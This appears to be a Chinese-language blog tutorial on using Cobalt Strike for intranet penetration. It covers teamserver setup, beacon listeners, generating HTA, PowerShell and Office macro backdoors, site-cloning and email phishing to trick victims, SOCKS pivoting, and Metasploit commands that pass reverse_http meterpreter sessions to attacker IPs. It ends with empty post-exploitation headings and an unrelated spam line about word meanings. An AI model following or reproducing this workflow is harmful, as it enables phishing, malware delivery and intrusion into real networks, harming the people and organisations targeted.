cs 入门使用
在github上找到一个非常全面的cs教程
浅浅的记录一下
https://github.com/zer0yu/Awesome-CobaltStrike
首先cs是一款内网渗透的多人运动神器,Cobalt Strike集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe木马生成,win dll木马生成,java木马生成,office宏病毒生成,木马捆绑;钓鱼攻击包括:站点克隆,目标信息获取,java执行,浏览器自动攻击等等功能,还有非常丰富的插件库
启动命令
sudo nohup ./teamserver 192.168.0.190 123456
监听器
beacon是cobalt strike的内置监听器 包括dns、http、https、smb四种方式的监听器 foreign为外部监听器,配合Metasploit或者Armitage的监听器。
http地址(stager)这个可以填写ip本身 也可以填写多个域名 但是这个域名解析必须是teamserver的地址。在dns增加了多条a记录均指向teamserver的ip
生成后门模块
hta文档
是后门的一种这里他给我们提供了3种生成方式 exe,powershell,vba。其中VBA方法需要目标系统上的MicrosoftOffice,在系统支持的情况下我们一般选择powershell,因为这种方式更加容易免杀。通常我们结合host File(文件下载功能) 来实行钓鱼。
office 宏
部分用户在使用office 的时候总喜欢点开运行宏文件,不得不说这是一种很具有欺骗性的方法,大部分没接触过安全的人可能觉得word或者excel
文件是安全的.
将cs生成的代码放置到宏里就可以了
payload生成器
web钓鱼模块
网站钓鱼
Manage 对开启的web服务进行管理;Clone Site 克隆网站,可以记录受害者提交的数据;Host File 提供一个文件下载,可以修改Mime信息;Scripted Web Delivery 类似于msf 的web_delivery ;Signed Applet Attack 使用java自签名的程序进行钓鱼攻击;Smart Applet Attack 自动检测java版本并进行攻击,针对Java 1.6.0_45以下以及Java 1.7.0_21以下版本;System Profiler 用来获取一些系统信息,比如系统版本,Flash版本,浏览器版本等
大体的使用方法就是克隆网站然后诱导受害者访问
受害者访问的时候会自动弹出下载文件
这个时候我们就需要给网站整一个好点的域名
区分度低些的
邮件钓鱼
从邮箱里导出eml的钓鱼模板
然后可以考虑将上面生成的web钓鱼网站的连接放到该邮件中
我们需要搭建一个邮件服务器我们才能够使用这个功能
Beacon使用
beacon 最初的目的是为了会话分派,但是在版本不断的更新之中,它有的更多的功能
我们可以用它进行端口扫描,网络探测,浏览器代理,列出进程等
由于没有啥复杂的操作,这里就略过
代理转发
socks代理
beacons里配置
socks 1080
proxychains.conf 文件中配置
socks4 192.168.0.195 1080
转发上线
新建的监听器在会话里新建
然后生成后门
再诱导内网用户运行后门即可
vpn 部署
会话
Cobalt Strike 的 Beacon 最初是一个稳定的生命线,让你可以保持对受害主机的访问权限。从一开始,Beacon 的主要目的就是向其他的 Cobalt Strike 监听器传递权限。使用 spawn 命令来为一个监听器派生一个会话。此 spawn 命令接受一个架构(如:x86,x64)和一个监听器作为其参数。默认情况下, spawn 命令会在 rundll32.exe 中派生一个会话
spwan 会话
注入进程获取会话
进程界面然后点击左下角的注入即可
派生会话到msf
msf照常监听端口
msf6 > use exploit/multi/handler[*] Using configured payload generic/shell_reverse_tcpmsf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_httppayload => windows/meterpreter/reverse_httpmsf6 exploit(multi/handler) > set lhost 10.10.10.141lhost => 10.10.10.141msf6 exploit(multi/handler) > set lport 8888lport => 8888msf6 exploit(multi/handler) > run
cs需要设置一个Foregin http 监听器
ip和端口填写的是msf的ip以及端口
再beacon 里使用命令 spawn msf 然后会话就会派生到msf里
从msf派生会话到cs
cs 正常建立监听器
msf选择payload_inject 模块,设置参数 disablepayloadhandler 禁止msf监听
use windows/local/payload_injectset disablepayloadhandler trueset paylaod windows/meterpreter/reverse_httpset lhost 192.168.0.195set lport 9999set session 1exploit
后渗透
获取hash
提权
需要自行去github上寻找cs提权脚本
获取明文密码
横向渗透
觅封侯是什么意思(悔教夫婿觅封侯是什么意思)|mm是什么单位的名称(尺寸的MM是什么意思?)